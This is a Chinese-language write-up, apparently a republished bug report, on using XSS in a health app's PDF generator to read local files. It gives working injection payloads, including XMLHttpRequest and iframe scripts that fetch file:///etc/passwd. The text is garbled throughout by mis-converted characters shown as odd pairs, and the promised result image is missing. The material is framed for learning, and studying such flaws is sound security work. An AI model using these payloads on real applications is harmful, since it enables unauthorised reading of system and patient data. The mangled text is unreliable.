利用PDF生成器XSS漏洞讀取系統(tǒng)本地文件的示例分析

這篇文章將為大家詳細(xì)講解有關(guān)利用PDF生成器XSS漏洞讀取系統(tǒng)本地文件的示例分析，小編覺(jué)得挺實(shí)用的，因此分享給大家做個(gè)參考，希望大家閱讀完這篇文章后可以有所收獲。

僅供參考學(xué)習(xí)使用

漏洞背景

測(cè)試目標(biāo)為某健康管理APP，它可以被預(yù)裝在安卓系統(tǒng)的移動(dòng)設(shè)備中，且其文件系統(tǒng)是封閉不可被訪問(wèn)讀取的。該APP設(shè)置了自定義啟動(dòng)器（custom launcher），用戶無(wú)法更改其界面或訪問(wèn)其內(nèi)置接口數(shù)據(jù)。所以在這里，由于利用XSS讀取本地文件繞過(guò)了該APP本來(lái)的業(yè)務(wù)邏輯，算是一個(gè)比較嚴(yán)重的漏洞了。

XSS => LFI

雖然XSS漏洞比較常見(jiàn)，但要想在移動(dòng)應(yīng)用APP中發(fā)現(xiàn)XSS漏洞也不簡(jiǎn)單，而且我還是在其內(nèi)置的PDF生成器（PDF generator）中發(fā)現(xiàn)了一個(gè)XSS。

由于該APP應(yīng)用允許用戶編輯自己的病歷記錄，然后保存為PDF打印，因此，我嘗試在病歷記錄中加入了以下正常的HTML Payload，想看看它會(huì)否在PDF生成時(shí)觸發(fā)XSS。

<h2>test</h2>test2

然后，在PDF生成過(guò)程中，該P(yáng)ayload被觸發(fā)了，但這沒(méi)啥大驚小怪的， 接下來(lái)我們要看看如何利用該XSS來(lái)破壞APP的邏輯。那就從讀取本地文件數(shù)據(jù)下手吧，然后我構(gòu)造了以下讀取本地文件的代碼：

<script>
 x=new XMLHttpRequest;
 x.onload=function(){
  document.write(this.responseText)
 };
 x.open("GET","file:///etc/passwd");
 x.send();
</script>

測(cè)試之后，沒(méi)啥顯示的。接著，我又用<img>繼續(xù)構(gòu)造：

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

哪想到這一構(gòu)造測(cè)試就直接把APP搞崩潰了，不知道是否用到了onerror或img標(biāo)簽才這樣，那就來(lái)個(gè)簡(jiǎn)單的吧：

<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

哦，執(zhí)行之后，在PDF生成時(shí)跳出了以下美妙畫(huà)面：

關(guān)于“利用PDF生成器XSS漏洞讀取系統(tǒng)本地文件的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，使各位可以學(xué)到更多知識(shí)，如果覺(jué)得文章不錯(cuò)，請(qǐng)把它分享出去讓更多的人看到。